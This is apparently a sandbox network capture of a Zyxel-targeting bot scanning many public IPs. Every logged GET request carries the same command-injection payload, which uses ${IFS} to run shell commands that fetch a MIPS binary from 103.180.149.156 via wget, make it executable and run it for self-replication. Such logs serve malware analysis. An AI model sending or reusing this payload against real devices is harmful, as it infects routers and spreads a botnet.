                                                        Feb 2, 2024 06:20:18.441447020 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        200192.168.2.14352781.100.130.57443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:18.441545963 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        201192.168.2.14547928.2.121.120443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:18.441545963 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        202192.168.2.1444800175.43.218.36443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:18.441565037 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        203192.168.2.1458024206.176.140.203443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:18.441600084 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        204192.168.2.145522886.165.167.251443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:18.441649914 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        205192.168.2.143775892.71.79.195443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:18.441709995 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        206192.168.2.1453786126.206.143.182443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:18.441747904 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        207192.168.2.1460736138.253.242.238443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:18.441808939 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        208192.168.2.1449612204.182.223.195443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:18.441842079 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        209192.168.2.1454204111.129.220.89443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:18.441910982 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        210192.168.2.1453992181.118.12.87443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:18.441958904 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        211192.168.2.1434882180.133.49.104443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:18.441998959 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        212192.168.2.1455938168.210.108.128443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:18.442006111 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        213192.168.2.1455162205.247.6.236443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:18.442037106 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        214192.168.2.144477694.238.61.66443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:18.442090988 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        215192.168.2.14469322.216.46.120443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:18.442121983 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        216192.168.2.1440048197.12.110.167443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:18.442224026 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        217192.168.2.146045890.17.71.191443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:18.442260981 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        218192.168.2.1439742193.40.40.184443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:18.442327976 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        219192.168.2.144250241.211.22.204443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:18.442363977 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        220192.168.2.1458412208.32.237.202443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:18.442398071 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        221192.168.2.1436486152.177.149.40443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:18.442434072 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        222192.168.2.143712612.175.125.90443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:18.442490101 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        223192.168.2.145316068.180.85.26443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:18.442514896 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        224192.168.2.1460426212.56.248.236443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:18.442526102 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        225192.168.2.1459980218.41.145.93443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:18.442600965 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        226192.168.2.144853862.11.135.11443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:18.442770004 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        227192.168.2.1446770134.131.101.151443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:18.442811012 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        228192.168.2.144749686.182.178.4443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:18.442847013 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        229192.168.2.1455450115.130.45.23443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:18.442903996 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        230192.168.2.1437044185.195.14.124443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:18.442950964 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        231192.168.2.1456630167.161.77.64443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:18.442991018 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        232192.168.2.1455958161.207.96.236443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:18.443042040 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        233192.168.2.1450162145.97.233.202443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:18.443094969 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        234192.168.2.1443486192.200.77.123443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:18.443130970 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        235192.168.2.144304438.110.125.26443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:18.446770906 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        236192.168.2.1433536169.9.44.220443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:18.450086117 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        237192.168.2.1448494192.162.204.17443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:18.450114965 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        238192.168.2.1447608148.53.60.237443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:19.432611942 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        239192.168.2.1440498137.99.148.48443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:19.432658911 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        240192.168.2.145702236.210.156.30443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:19.432703018 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        241192.168.2.145519685.130.86.190443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:19.432746887 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        242192.168.2.14344108.15.9.65443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:19.432781935 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        243192.168.2.1437296195.128.144.207443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:19.432836056 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        244192.168.2.1440132185.248.173.28443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:19.432868004 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        245192.168.2.145719093.222.194.182443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:19.432893991 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        246192.168.2.144239878.35.34.138443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:19.432970047 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        247192.168.2.144820612.174.60.44443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:19.433015108 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        248192.168.2.1453830140.180.198.79443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:19.433219910 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        249192.168.2.144093689.68.12.230443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:19.433279991 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        250192.168.2.145865698.31.68.174443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:20.466137886 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        251192.168.2.1434752202.166.71.68443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:20.466182947 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        252192.168.2.1432998124.58.106.56443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:20.466227055 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        253192.168.2.1451254107.62.144.239443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:20.466272116 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        254192.168.2.1457190141.181.121.51443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:20.466362000 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        255192.168.2.143607227.111.253.86443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:20.466371059 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        256192.168.2.1459058111.33.132.149443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:20.466432095 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        257192.168.2.145491217.28.171.205443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:20.466474056 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        258192.168.2.1442582135.247.85.164443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:20.466617107 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        259192.168.2.1459648138.24.103.168443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:20.466748953 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        260192.168.2.1442734174.199.10.216443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:20.466805935 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        261192.168.2.144266887.28.174.25443
                                                        TimestampBytes transferredDirectionData
                                                        Feb 2, 2024 06:20:21.471205950 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        262192.168.2.1449858158.237.243.5443
                                                        TimestampBytes transferredDirectionData
